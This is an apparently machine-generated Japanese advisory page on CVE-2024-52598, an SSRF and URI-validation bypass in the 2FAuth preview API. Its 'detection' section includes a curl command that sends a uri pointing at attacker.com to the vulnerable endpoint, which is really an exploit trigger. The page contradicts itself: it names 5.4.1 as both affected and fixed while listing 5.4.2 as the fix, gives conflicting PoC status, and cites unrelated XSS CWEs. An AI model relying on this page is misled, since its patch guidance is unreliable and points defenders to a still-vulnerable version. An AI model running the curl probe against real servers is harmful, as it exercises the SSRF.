HIGHCVE-2024-52598CVSS 7.5

2FAuth は Server Side Request Forgery と URI 検証バイパスの脆弱性 (2fauth /api/v1/twofaccounts/preview) を抱えている

Q: CVE-2024-52598 — SSRF in 2FAuthとは何ですか？

CVE-2024-52598は、2FAuthバージョン5.4.1以下において、攻撃者が任意のURLへのリクエストを強制できるSSRF脆弱性です。

Q: CVE-2024-52598 in 2FAuthの影響は受けますか？

2FAuthのバージョンが5.4.1以下の場合、この脆弱性の影響を受けます。

Q: CVE-2024-52598 in 2FAuthを修正するにはどうすればよいですか？

2FAuthをバージョン5.4.1にアップデートしてください。

Q: CVE-2024-52598は積極的に悪用されていますか？

現時点では、公開されているPoCは確認されていませんが、SSRF脆弱性は悪用されやすい可能性があります。

Q: CVE-2024-52598に関する2FAuthの公式アドバイザリはどこで入手できますか？

2FAuthの公式アドバイザリは、[2FAuthの公式ウェブサイト](https://2fauth.org/)で確認してください。

プラットフォーム

other

コンポーネント

2fauth

修正版

5.4.2

AI Confidence: highNVDEPSS 0.1%レビュー済み: 2026年5月

NVDで見る

保存

CVE-2024-52598は、2FAuthというTwo-Factor Authentication (2FA)アカウント管理Webアプリケーションにおいて、SSRF（サーバーサイドリクエストフォワード）とURI検証のバイパス脆弱性が存在します。この脆弱性を悪用されると、攻撃者は任意のURLへのリクエストを強制し、そのコンテンツをサーバーに画像ファイルとして保存することが可能です。影響を受けるバージョンは5.4.1以下であり、バージョン5.4.1へのアップデートで修正されています。

影響と攻撃シナリオ

この脆弱性は、攻撃者が2FAuthサーバーを介して任意の内部または外部リソースにアクセスすることを可能にします。攻撃者は、機密情報を含む内部サービスへのアクセスを試みたり、他のシステムへの攻撃の足がかりとして利用したりする可能性があります。URI検証のバイパスにより、通常は制限されているリソースへのアクセスが可能になり、潜在的なデータ漏洩やシステムへの影響が拡大する可能性があります。この脆弱性は、類似のSSRF脆弱性と同様に、内部ネットワークへの侵入経路として悪用される可能性があります。

悪用の状況

CVE-2024-52598は、2024年11月20日に公開されました。現時点では、この脆弱性を悪用した公開されているPoC（Proof of Concept）は確認されていませんが、SSRF脆弱性は一般的に悪用されやすく、今後の攻撃キャンペーンに利用される可能性があります。CISA KEVカタログへの登録状況は不明です。

リスク対象者翻訳中…

Organizations using 2FAuth to manage two-factor authentication, particularly those with internal services accessible from the 2FAuth server, are at risk. Environments with weak network segmentation or inadequate WAF protection are especially vulnerable. Shared hosting environments where multiple users share the same 2FAuth instance could also be affected, potentially allowing an attacker to compromise other users' 2FA accounts.

検出手順翻訳中…

• linux / server:

journalctl -u 2fauth -g "remote URI retrieval"

• generic web:

curl -I <2fauth_server_ip>/api/v1/twofaccounts/preview -d 'uri=http://attacker.com/malicious_image.jpg' | grep -i 'Server:'

攻撃タイムライン

2024-11-20Disclosure
disclosure

脅威インテリジェンス

エクスプロイト状況

概念実証不明

CISA KEVNO

インターネット露出高

EPSS

0.12% (31% パーセンタイル)

CISA SSVC

悪用状況poc

自動化可能yes

技術的影響partial

CVSS ベクトル

影響を受けるソフトウェア

コンポーネント2fauth

ベンダーBubka

影響範囲修正版

< 5.4.1 – < 5.4.15.4.2

弱点分類 (CWE)

CWE-79 CWE-80 CWE-918

タイムライン

予約済み2024-11-14
公開日2024-11-20
EPSS 更新日2026-04-02

緩和策と回避策

この脆弱性への最も効果的な対策は、2FAuthをバージョン5.4.1にアップデートすることです。アップデートがすぐに適用できない場合は、WAF（Web Application Firewall）を使用して、外部からのリクエストを検証し、悪意のあるURIをブロックすることを検討してください。また、2FAuthがアクセスする内部リソースへのアクセスを制限し、最小権限の原則を適用することも重要です。アップデート後、2FAアカウントのセキュリティコードが正しく生成されることを確認してください。

修正方法

2FAuth をバージョン 5.4.1 以降にアップデートしてください。このバージョンは、Server Side Request Forgery (SSRF) と URI 検証バイパスの脆弱性を修正しています。アップデートすることで、外部の攻撃者がアプリケーションを介して内部リソースにアクセスすることを防ぎます。

CVEセキュリティニュースレター

脆弱性分析と重要アラートをメールでお届けします。

よくある質問

CVE-2024-52598 — SSRF in 2FAuthとは何ですか？